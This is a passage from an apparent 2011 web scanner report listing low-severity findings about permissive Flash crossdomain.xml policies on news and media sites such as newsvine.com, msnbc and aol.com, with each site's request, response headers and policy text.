P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

6.41. http://admedia.wsod.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://admedia.wsod.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admedia.wsod.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:22 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n35 ( iad-agg-n36), rf-ht iad-agg-n36 ( origin>CONN)
Cache-Control: max-age=259200
Expires: Wed, 02 Feb 2011 02:05:22 GMT
Age: 0
Content-Length: 821
Content-Type: text/xml
Last-Modified: Tue, 16 Feb 2010 21:41:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tumri.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tcgmsrv.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.teracent.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ytsa.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

6.42. http://alex-johnson.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://alex-johnson.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: alex-johnson.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=968
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.43. http://athima-chansanchai.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://athima-chansanchai.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: athima-chansanchai.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=973
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.44. http://bodyodd.msnbc.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bodyodd.msnbc.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bodyodd.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:06:09 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.45. http://boyle.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://boyle.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: boyle.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=989
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.46. http://cartoonblog.msnbc.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cartoonblog.msnbc.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cartoonblog.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:06:16 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.47. http://cdn.modules.ooyala.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cdn.modules.ooyala.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.modules.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Accept-Ranges: bytes
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=259200
Date: Sun, 30 Jan 2011 12:49:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.48. http://dateline.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dateline.msnbc.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dateline.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:03 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.49. http://hardball.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://hardball.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: hardball.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:22 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.50. http://helenaspopkin.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://helenaspopkin.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: helenaspopkin.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:18 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=994
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.51. http://info.ooyala.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://info.ooyala.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: info.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:39:14 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=3600, public
Connection: close
Content-Type: text/x-cross-domain-policy
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.52. http://ingame.msnbc.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ingame.msnbc.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ingame.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:08:29 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.53. http://ingame.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ingame.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ingame.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:25 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=952
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.54. http://jp.video.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://jp.video.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: jp.video.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 530
Content-Type: text/xml
Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT
Accept-Ranges: bytes
ETag: "01042b01256ca1:1892"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.redacted" />
<allow-access-from domain="sand.msn-int.com" />
<allow-access-from domain="*.nineredacted.au" />
<allow-access-from domain="*.bing.com" />
<allow-access-from domain="*.playredacted" />
<allow-access-from domain="*.video.s-redacted" />
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" />
...[SNIP]...

6.55. http://l.player.ooyala.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://l.player.ooyala.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 12:49:02 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Cache-Control: max-age=3600, private
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.56. http://latino.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://latino.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: latino.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

6.57. http://latino.video.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://latino.video.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: latino.video.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 530
Content-Type: text/xml
Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT
Accept-Ranges: bytes
ETag: "01042b01256ca1:179a"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.redacted" />
<allow-access-from domain="sand.msn-int.com" />
<allow-access-from domain="*.nineredacted.au" />
<allow-access-from domain="*.bing.com" />
<allow-access-from domain="*.playredacted" />
<allow-access-from domain="*.video.s-redacted" />
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" />
...[SNIP]...

6.58. http://live.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://live.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: live.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:24 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=993
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.59. http://michaelwann.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://michaelwann.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: michaelwann.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:31 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=976
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.60. http://money.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://money.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: money.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 221
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
